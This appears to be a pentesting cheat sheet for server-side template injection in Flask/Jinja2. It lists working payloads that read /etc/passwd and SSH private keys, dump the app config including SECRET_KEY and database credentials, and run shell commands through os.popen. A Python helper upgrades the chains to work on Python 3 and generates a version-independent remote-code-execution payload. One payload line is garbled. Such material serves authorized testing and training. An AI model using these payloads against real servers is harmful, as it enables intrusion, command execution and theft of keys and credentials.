Flask

SSTI (Server Side Template Injection)

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti

Detection (works in both Jinja2 and Twig, the PHP engine):
{{7*7}}

Engine fingerprint: Jinja2 (Python) renders 7777777 (string repetition), Twig (PHP) coerces and renders 49:
{{7*'7'}}
Flask/Jinja2 file read:
# ''.__class__.__mro__[2].__subclasses__()[40] = file class on Python 2.7 only:
# on Python 3 str.__mro__ is (str, object), so [2] raises IndexError (use [1] or __base__),
# and the subclass index differs per interpreter/app, so locate the class by name rather than trusting 40
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/home/user/.ssh/id_rsa').read() }}
# config.items()[4][1] indexes the items list; only works on Python 2 (dict_items is not subscriptable on Python 3)
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
# Reach builtins through a Flask helper's module globals, version-independent:
# https://github.com/pallets/flask/blob/master/src/flask/helpers.py#L398
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
{{ get_flashed_messages.__globals__.__builtins__.open("/home/user/.ssh/id_rsa").read() }}

# URL-based enumeration (Jinja2)

# dump the app config, including SECRET_KEY and any database credentials
http://10.0.0.1/{{config.items()}}
# import the os module into the config (uppercase attributes are copied in), then list it with config.items()
http://10.0.0.1/{{config.from_object('os')}}
# confirm Flask helpers are reachable from the template context
{{get_flashed_messages}}
# function -> object -> every loaded class; find gadgets (file, Popen, _wrap_close, catch_warnings) by name
{{get_flashed_messages.__class__.__mro__[1].__subclasses__()}}
# confirm Python method calls are evaluated
{{"foo".upper()}}
# RCE: request.application is a werkzeug function, so its __globals__ expose the builtins dict
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request.application.__globals__.__globals__ is not needed; same chain, different command:
{{request.application.__globals__.__builtins__.__import__('os').popen('ls *').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('cat file.txt').read()}}
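The payloads above hard-code `__subclasses__()[40]` and `__mro__[2]`, which only hold on a Python 2.7 interpreter with a particular import order. The script below is an added example (not from this page or from Flask) that mirrors what the file-read and `popen` payloads do, but resolves the gadget class by name at run time so the same chain works on Python 3. It assumes the target imports `os` (every Flask process does), uses `os._wrap_close` as the gadget because it is defined in `os.py` and so its `__init__.__globals__` is the `os` module namespace, and reads back a temp file it writes itself as constructed test data.

```python
"""Added example: locate SSTI gadget classes by name instead of trusting a fixed subclass index."""
import os
import tempfile


def mro_root(obj):
    """Return the last entry of the MRO (always `object`), whatever Python version runs the app.

    Python 2: ''.__class__.__mro__ == (str, basestring, object)  -> [2] works
    Python 3: ''.__class__.__mro__ == (str, object)              -> [2] is IndexError, [-1] is safe
    """
    return type(obj).__mro__[-1]


def subclass_index(name):
    """Return (index, cls) of the first direct subclass of object called `name`, or None.

    The index is what the payloads on this page hard-code as 40; it depends on the
    interpreter version and on which modules the application has imported.
    """
    for i, cls in enumerate(mro_root('').__subclasses__()):
        if cls.__name__ == name:
            return i, cls
    return None


def builtins_via(cls):
    """Reach the builtins through the module globals of the gadget's __init__.

    In CPython a non-__main__ module stores __builtins__ as a dict; handle both shapes.
    """
    b = cls.__init__.__globals__['__builtins__']
    return b if isinstance(b, dict) else vars(b)


def read_file_via_gadget(path):
    """Equivalent of the page's `...__subclasses__()[40]('/etc/passwd').read()` chain."""
    _, cls = subclass_index('_wrap_close')          # os._wrap_close, assumed loaded (os always is)
    with builtins_via(cls)['open'](path) as fh:
        return fh.read()


def run_command_via_gadget(cmd):
    """Equivalent of the page's `__import__('os').popen(cmd).read()` chain, without __import__."""
    _, cls = subclass_index('_wrap_close')
    return cls.__init__.__globals__['popen'](cmd).read()   # __globals__ here is the os module dict


def jinja_payload(name='_wrap_close', cmd='id'):
    """Build a Jinja2 payload that does the same name lookup at render time (hypothetical helper)."""
    return ("{% for c in ''.__class__.__mro__[-1].__subclasses__() %}"
            "{% if c.__name__ == '" + name + "' %}"
            "{{ c.__init__.__globals__['popen']('" + cmd + "').read() }}"
            "{% endif %}{% endfor %}")


def demo_read():
    """Write constructed data to a temp file and read it back through the gadget chain."""
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, 'w') as fh:
            fh.write('flag{constructed-sample}\n')   # constructed test content, not a real flag
        return read_file_via_gadget(path)
    finally:
        os.unlink(path)


if __name__ == '__main__':
    idx, cls = subclass_index('_wrap_close')
    print('gadget index on this interpreter:', idx, '(the page assumes 40)')
    print(demo_read().strip())
    print(run_command_via_gadget('id').strip())
    print(jinja_payload())
```

Run it under two different Python versions and compare the printed index: that is the reason a payload copied from a cheatsheet silently fails, and why the `{% for %}` lookup in `jinja_payload` is the form to send when the target's interpreter is unknown.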
